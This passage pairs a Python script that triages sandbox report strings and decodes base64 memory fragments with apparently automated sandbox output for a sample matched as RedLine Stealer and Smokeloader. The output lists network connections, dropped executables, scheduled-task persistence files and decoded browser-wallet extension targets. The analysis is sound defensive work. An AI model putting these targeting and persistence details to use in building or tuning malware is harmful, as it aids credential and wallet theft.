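# two from file.exe memory (long base64-looking tails) and one firefox.exe entry.
REPORT_LINES = [
    "Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp "
    "String found in binary or memory: https://www.mozilla.org/privacy/firefox/"
    "kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp",
    "Source: file.exe, 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmp "
    "String found in binary or memory: https://www.mozilla.org/privacy/firefox/"
    "vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx",
    "Source: firefox.exe, 00000021.00000003.3216319694.0000016DE4B24000.00000004.00000800.00020000.00000000.sdmp, "
    "firefox.exe, 00000021.00000003.3215505857.0000016DE4B2D000.00000004.00000800.00020000.00000000.sdmp "
    "String found in binary or memory: https://www.reddit.com/",
]

_LINE_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<string>\S+)$")

def parse_line(line):
    """Split a report record into the processes / dropped files it came from and the string itself."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    tokens = [t.strip() for t in m.group("sources").split(",")]
    return {
        "processes": sorted({t for t in tokens if t.endswith(".exe")}),
        "dropped_files": sorted({t for t in tokens if t.endswith(".dr")}),
        "string": m.group("string"),
    }

_B64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
_VAL = {c: i for i, c in enumerate(_B64)}

def b64_stream_decode(symbols):
    """Decode base64 symbols as a bit stream: no padding needed, a trailing partial byte is dropped."""
    acc = nbits = 0
    out = bytearray()
    for c in symbols:
        acc = (acc << 6) | _VAL[c]
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
            acc &= (1 << nbits) - 1
    return bytes(out)

def recover_alignments(fragment):
    """A fragment cut out of the middle of a base64 stream may start at any of four symbol
    alignments; try each and keep the ones that decode to printable ASCII."""
    found = {}
    for skip in range(4):
        symbols = fragment[skip:]
        if not symbols or any(c not in _VAL for c in symbols):
            continue
        raw = b64_stream_decode(symbols)
        if raw and all(0x20 <= b < 0x7F for b in raw):
            found[skip] = raw.decode("ascii")
    return found

# Assumption: Chromium extension IDs are 32 characters drawn from a-p.
_EXT_ID_RE = re.compile(r"[a-p]{32}")
MIN_TAIL = 16  # assumption: shorter URL tails are just ordinary path components

def triage(lines, sample_proc="file.exe"):
    """Separate strings seen in the sample's own memory from those seen only elsewhere,
    and decode any long base64-looking tail on the sample's strings."""
    sample, elsewhere, decoded = [], [], {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        (sample if sample_proc in rec["processes"] else elsewhere).append(rec["string"])
    for s in sample:
        tail = s.rsplit("/", 1)[-1]
        if len(tail) < MIN_TAIL:
            continue
        alignments = recover_alignments(tail)
        if alignments:
            skip = min(alignments)          # prefer the smallest shift that decodes cleanly
            text = alignments[skip]
            decoded[tail] = {"skip": skip, "text": text, "extension_ids": _EXT_ID_RE.findall(text)}
    return {"sample": sample, "elsewhere": elsewhere, "decoded": decoded}

if __name__ == "__main__":
    for tail, info in triage(REPORT_LINES)["decoded"].items():
        print(f"skip={info['skip']} {tail[:12]}... -> {info['text']!r} ids={info['extension_ids']}")
```

On the two fragments this yields "gcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpj" and "Form|pnlccmojcmeohlpggmfnbbiapkmbliob|1|0|0|": pipe-delimited records of a name, a 32-character Chromium extension ID and three flags, truncated at both ends by the extractor's string boundaries, with only the second carrying a complete ID. That layout is what a list of browser extensions to target looks like; confirm the IDs against the wallet and extension indicators elsewhere in the report before treating them as configuration.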
Source: unknown Network traffic detected: HTTP traffic on port 64318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 64238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64353 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64330 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64273 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 64285 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64365 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 64307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64341 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 64203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 64226 -> 443
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64097 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64155 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 18.65.39.112:443 -> 192.168.2.5:64195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:64197 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64216 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64214 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64218 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64219 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64268 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64269 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64272 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64276 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64280 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64288 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64287 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64310 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64314 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64319 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64320 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64323 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64325 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64327 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64328 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64330 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64331 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64334 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64333 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64335 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64337 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64336 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64339 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64340 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64338 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64341 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64342 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64345 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64346 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64348 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64351 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64353 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64354 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64355 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64356 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64357 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64358 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64359 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64360 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64361 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64364 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64365 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64363 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64366 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64367 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64368 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64369 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64372 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64373 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64375 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64377 version: TLS 1.2

System Summary

Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name: .idata
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name:
Source: axplong.exe.5.dr Static PE information: section name: .idata
Source: axplong.exe.5.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5EB700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5EB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5EB910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C58F280
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5835A0 0_2_6C5835A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F545C 0_2_6C5F545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C595440 0_2_6C595440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C5C10 0_2_6C5C5C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D2C10 0_2_6C5D2C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FAC00 0_2_6C5FAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F542B 0_2_6C5F542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AD4D0 0_2_6C5AD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5964C0 0_2_6C5964C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C6CF0 0_2_6C5C6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58D4E0 0_2_6C58D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596C80 0_2_6C596C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E34A0 0_2_6C5E34A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EC4A0 0_2_6C5EC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B0512 0_2_6C5B0512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AED10 0_2_6C5AED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59FD00 0_2_6C59FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C0DD0 0_2_6C5C0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E85F0 0_2_6C5E85F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A9E50 0_2_6C5A9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C3E50 0_2_6C5C3E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D2E4E 0_2_6C5D2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A4640 0_2_6C5A4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58C670 0_2_6C58C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F6E63 0_2_6C5F6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C7E10 0_2_6C5C7E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D5600 0_2_6C5D5600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9E30 0_2_6C5E9E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58BEF0 0_2_6C58BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59FEF0 0_2_6C59FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F76E3 0_2_6C5F76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A5E90 0_2_6C5A5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EE680 0_2_6C5EE680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E4EA0 0_2_6C5E4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C7710 0_2_6C5C7710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C599F00 0_2_6C599F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B6FF0 0_2_6C5B6FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58DFE0 0_2_6C58DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D77A0 0_2_6C5D77A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A8850 0_2_6C5A8850
